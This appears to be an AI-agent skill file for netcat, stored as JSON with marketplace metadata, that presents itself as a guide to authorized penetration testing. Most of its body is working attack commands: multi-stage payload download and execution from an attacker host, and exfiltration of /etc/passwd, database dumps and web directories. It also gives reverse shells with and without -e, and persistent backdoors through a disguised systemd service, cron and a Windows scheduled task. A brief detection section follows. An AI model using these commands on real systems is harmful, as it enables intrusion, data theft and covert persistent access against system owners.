phases","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"OWASP","type":"text","marks":[{"type":"strong"}]},{"text":": Command injection testing methodology","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Common Patterns","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 1: Web Server Vulnerability Validation","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Test for command injection vulnerability\necho -e \"GET /?cmd=id HTTP/1.0\\r\\n\\r\\n\" | nc \u003ctarget-ip> 80\n\n# SQL injection parameter testing\necho -e \"GET /page?id=1' OR '1'='1 HTTP/1.0\\r\\n\\r\\n\" | nc \u003ctarget-ip> 80\n\n# Test HTTP methods\necho -e \"OPTIONS / HTTP/1.0\\r\\n\\r\\n\" | nc \u003ctarget-ip> 80","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 2: Multi-stage Payload Delivery","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Stage 1: Attacker listener\nnc -lvnp 4444 > stage2_payload.sh\n\n# Stage 2: Target downloads next stage\nnc \u003cattacker-ip> 4444 \u003c /dev/null > /tmp/stage2.sh\nchmod +x /tmp/stage2.sh\n/tmp/stage2.sh\n\n# Stage 3: Execute downloaded payload\n# (payload establishes full reverse shell)","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 3: Data Exfiltration","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Exfiltrate sensitive files\ncat /etc/passwd | nc \u003cattacker-ip> 5555\n\n# Exfiltrate database dump\nmysqldump -u root -p database_name | nc \u003cattacker-ip> 5555\n\n# Compress and exfiltrate directory\ntar czf - /var/www/html | nc \u003cattacker-ip> 5555\n\n# Receiver\nnc -lvnp 5555 > exfiltrated_data.tar.gz","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 4: Persistent Backdoor (Authorized Testing)","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Create systemd service for persistence (Linux)\ncat > /etc/systemd/system/netcat-backdoor.service \u003c\u003cEOF\n[Unit]\nDescription=Network Connectivity Check\nAfter=network.target\n\n[Service]\nType=simple\nExecStart=/bin/nc \u003cattacker-ip> 4444 -e /bin/bash\nRestart=always\nRestartSec=60\n\n[Install]\nWantedBy=multi-user.target\nEOF\n\nsystemctl enable netcat-backdoor.service\nsystemctl start netcat-backdoor.service\n\n# Cron-based persistence\n(crontab -l; echo \"@reboot /bin/nc \u003cattacker-ip> 4444 -e /bin/bash\") | crontab -\n\n# Windows scheduled task\nschtasks /create /tn \"NetworkCheck\" /tr \"C:\\ncat.exe \u003cattacker-ip> 4444 -e cmd.exe\" /sc onstart /ru System","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Integration Points","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Metasploit Integration","type":"text"}]},{"type":"paragraph","content":[{"text":"Use netcat as post-exploitation utility:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Metasploit session backgrounding and netcat shell\nmeterpreter > execute -f nc -a \"\u003cattacker-ip> 4444 -e /bin/bash\"\n\n# Upload netcat to target\nmeterpreter > upload /usr/bin/nc /tmp/nc\nmeterpreter > shell\nsh-4.2$ /tmp/nc \u003cattacker-ip> 5555 -e /bin/bash","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Scripting and Automation","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"#!/bin/bash\n# automated_shell_catcher.sh - Automatic reverse shell handler\n\nPORT=4444\nLOG_DIR=\"shells/$(date +%Y%m%d)\"\nmkdir -p \"$LOG_DIR\"\n\nwhile true; do\n TIMESTAMP=$(date +%H%M%S)\n echo \"[*] Listening on port $PORT...\"\n nc -lvnp $PORT | tee \"$LOG_DIR/shell_$TIMESTAMP.log\"\n echo \"[*] Connection closed, restarting listener...\"\n sleep 2\ndone","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Troubleshooting","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: \"nc: command not found\"","type":"text"}]},{"type":"paragraph","content":[{"text":"Solutions","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Install netcat (Ubuntu/Debian)\nsudo apt-get install netcat-traditional\nsudo apt-get install netcat-openbsd\n\n# Install ncat (Nmap project, more features)\nsudo apt-get install ncat\n\n# Check available version\nwhich nc ncat netcat","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: \"-e flag not supported\"","type":"text"}]},{"type":"paragraph","content":[{"text":"Solution","type":"text","marks":[{"type":"strong"}]},{"text":": Use alternative technique with named pipes:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Linux reverse shell without -e\nrm /tmp/f; mkfifo /tmp/f\ncat /tmp/f | /bin/sh -i 2>&1 | nc \u003cattacker-ip> 4444 > /tmp/f\n\n# Or use ncat which supports -e\nncat \u003cattacker-ip> 4444 -e /bin/bash","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: Connection Dies Immediately","type":"text"}]},{"type":"paragraph","content":[{"text":"Causes","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Firewall blocking connection","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"No interactive prompt keeping connection alive","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Process killed by security software","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Solutions","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Keep connection alive with while loop\nwhile true; do nc \u003cattacker-ip> 4444 -e /bin/bash; sleep 10; done\n\n# Use ncat with keep-alive\nncat -lvnp 4444 --keep-open\n\n# Add reconnection logic\nwhile true; do nc \u003cattacker-ip> 4444 -e /bin/bash 2>/dev/null; sleep 60; done","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: Can't Get Interactive Shell","type":"text"}]},{"type":"paragraph","content":[{"text":"Solutions","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Upgrade to PTY shell\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\n\n# Set terminal type\nexport TERM=xterm\n\n# Enable raw mode (for Ctrl+C, etc.)\n# On attacker machine, background shell with Ctrl+Z:\nstty raw -echo; fg","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Defensive Considerations","type":"text"}]},{"type":"paragraph","content":[{"text":"Organizations can detect netcat activity by:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Process Monitoring","type":"text","marks":[{"type":"strong"}]},{"text":": Detect nc/ncat process execution","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Network Monitoring","type":"text","marks":[{"type":"strong"}]},{"text":": Unusual outbound connections to non-standard ports","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Command-Line Auditing","type":"text","marks":[{"type":"strong"}]},{"text":": Monitor for -e flag usage","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Traffic Analysis","type":"text","marks":[{"type":"strong"}]},{"text":": Unencrypted shell traffic patterns","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"File Integrity","type":"text","marks":[{"type":"strong"}]},{"text":": Detect unauthorized netcat binaries","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Enhance defensive posture:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Block outbound connections to non-business ports","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Monitor for process execution from unusual locations","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Deploy EDR solutions to detect reverse shell patterns","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Enable egress filtering on firewalls","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Audit Sysmon Event ID 1 (Process Creation) for nc/ncat","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Detect named pipe creation (Linux: mkfifo)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Monitor cron jobs and systemd services for suspicious entries","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"References","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Ncat Users' Guide","type":"text","marks":[{"type":"link","attrs":{"href":"https://nmap.org/ncat/guide/index.html","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"GTFOBins: netcat","type":"text","marks":[{"type":"link","attrs":{"href":"https://gtfobins.github.io/gtfobins/nc/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"MITRE ATT&CK: Command and Scripting Interpreter","type":"text","marks":[{"type":"link","attrs":{"href":"https://attack.mitre.org/techniques/T1059/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"PTES: Post Exploitation","type":"text","marks":[{"type":"link","attrs":{"href":"http://www.pentest-standard.org/index.php/Post_Exploitation","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Reverse Shell Cheat Sheet","type":"text","marks":[{"type":"link","attrs":{"href":"https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","title":null}}]}]}]}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"network-netcat","tags":["networking","netcat","reverse-shell","file-transfer","port-scanning","banner-grabbing"],"author":"@skillopedia","source":{"stars":336,"repo_name":"marketplace","origin_url":"https://github.com/aiskillstore/marketplace/blob/HEAD/skills/agentsecops/network-netcat/SKILL.md","repo_owner":"aiskillstore","body_sha256":"13382617691b38127d8a026eaeec9de372de51358fe51336d332fee06ce51ed7","cluster_key":"40c545560d7abbcd7e914495cbba920bdc7b72b25e0ac3f94cebda2c79742f51","clean_bundle":{"format":"clean-skill-bundle-v1","source":"aiskillstore/marketplace/skills/agentsecops/network-netcat/SKILL.md","attachments":[{"id":"39cc49c0-4783-5a15-97ae-344b6bfd6513","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/39cc49c0-4783-5a15-97ae-344b6bfd6513/attachment.yml","path":"assets/ci-config-template.yml","size":11105,"sha256":"0fc554799a0e03a44883990f208f2a428f3c1e70eed1a9bcfbc01e728962b91e","contentType":"application/yaml; charset=utf-8"},{"id":"8c2234f9-c018-5adb-bf81-14ba5d97d975","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/8c2234f9-c018-5adb-bf81-14ba5d97d975/attachment.yaml","path":"assets/rule-template.yaml","size":11044,"sha256":"cb228a390bcd3745cafb1783c6337d9106ae179e853935ae19c90caac10a0497","contentType":"application/yaml; charset=utf-8"},{"id":"00b41a4c-aec9-53e5-9aa2-6c0acad7922d","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/00b41a4c-aec9-53e5-9aa2-6c0acad7922d/attachment.md","path":"references/EXAMPLE.md","size":15672,"sha256":"d830809dec44c82770c5ef0fe12831754f113931dc739891a1ec8186aefc629f","contentType":"text/markdown; charset=utf-8"},{"id":"1ed1d073-7daa-5083-8b3b-40b5540735dd","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/1ed1d073-7daa-5083-8b3b-40b5540735dd/attachment.md","path":"references/WORKFLOW_CHECKLIST.md","size":8390,"sha256":"f667c8d5c6e5c50b491643d644082ff202a6bb94476e0e7b648c6d0e5c8a080f","contentType":"text/markdown; charset=utf-8"},{"id":"72526846-9b6c-56fc-9425-c7b41156c285","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/72526846-9b6c-56fc-9425-c7b41156c285/attachment.json","path":"skill-report.json","size":35540,"sha256":"c5481234c5334d5c7aba4737ef83bc713e0a5dbefb8350e40348446f3e5e35f9","contentType":"application/json; charset=utf-8"}],"bundle_sha256":"f01d72f0500cbb4dbbcfbbc14f7dbaf4ad2c808b4e613df5d3de81e523817eda","attachment_count":5,"text_attachments":5,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":1,"skill_md_path":"skills/agentsecops/network-netcat/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"security","category_label":"Security"},"exact_dupes_collapsed_into_this":0},"version":"v1","category":"security","frameworks":["MITRE-ATT&CK","PTES"],"import_tag":"clean-skills-v1","maintainer":"[email protected]","references":["https://nmap.org/ncat/guide/index.html","https://attack.mitre.org/techniques/T1059/"],"description":"Network utility for reading and writing data across TCP/UDP connections, port scanning, file transfers, and backdoor communication channels. Use when: (1) Testing network connectivity and port availability, (2) Creating reverse shells and bind shells for authorized penetration testing, (3) Transferring files between systems in restricted environments, (4) Banner grabbing and service enumeration, (5) Establishing covert communication channels, (6) Testing firewall rules and network segmentation.\n","dependencies":{"packages":["netcat","ncat"]}}},"renderedAt":1782987164655}

Netcat Network Utility Overview Netcat (nc) is the "Swiss Army knife" of networking tools, providing simple Unix utility for reading and writing data across network connections. This skill covers authorized offensive security applications including reverse shells, bind shells, file transfers, port scanning, and banner grabbing. IMPORTANT : Netcat capabilities can be used maliciously. Only use these techniques in authorized penetration testing environments with proper written permission. Quick Start Basic connection and listening: Core Workflow Netcat Operations Workflow Progress: [ ] 1. Verif…